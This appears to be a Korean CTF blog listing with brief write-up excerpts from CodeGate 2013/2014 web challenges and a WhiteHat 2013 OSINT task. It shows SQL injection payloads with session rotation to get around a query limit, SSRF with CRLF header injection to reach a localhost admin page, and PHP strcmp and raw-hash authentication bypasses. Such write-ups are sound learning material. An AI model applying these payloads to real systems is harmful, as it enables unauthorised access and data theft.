D:\/CTF 썸네일형 리스트형 [CodeGate 2014] web 500 hint 120 Count -> 새로운 암호생성 세션 변경시 -> 새로운 암호생성 1'or 1='1 1'or 1='2 세션 gvqmir6dlg2rl9se35j6n73uh1 부터 gvqmir6dlg2rl9se35j6n73uh5 까지 생성 후 돌려가며 쿼리를 날리면 120번이라는 카운트는 무의미하게 된다. select * from rms_120_pw where (ip='x.x.x.x') and (password='1 or substr(password,1,1)='g') False select * from rms_120_pw where (ip='x.x.x.x') and (password='1 or substr(password,1,1)='h') True 더보기 [CodeGate 2014] web 200 ex) http://naver.comfilter: php, // ... Hint http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/ http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/ HTTP/1.0%0aRange: bytes=372-%0a%0a http://58.229.183.24/188f6594f694a3ca082f7530b5efc.. 더보기 CODEGATE2013 - web200 strcmp 함수로 id를 암호화한 값과 입력 pw와 비교하여 같으면 0이라는 값이 나와야 한다. 허나 ps 파라미터 값에 배열이 들어가면 0(NULL) 이라는 오류 값을 반환하여 우회가 가능하다. id=127.0.0.1&ps[] 더보기 CODEGATE2013 - web100 hash("whirlpool",$ps, true); = true 옵션 사용 시 바이너리 생성 랜덤한 숫자를 넣어 바이너리 생성 시 '=' 값이 있으면 우회가 가능하다 더보기 2013 화이트햇 콘테스트 stalking2 (100 points) Twitter Facebook 더보기 2013 화이트햇 콘테스트 stalking (100 points) ls-al.org 가보면 별 내용 없었음 http://whois.kisa.or.kr 에 가서 도메인 검색하면 Admin 정보가 나온다. Admin 정보중 폰번호 검색으로 의심가는 블로그 발견! 이름이 답이라고 했으니 Success 더보기 이전 1 다음
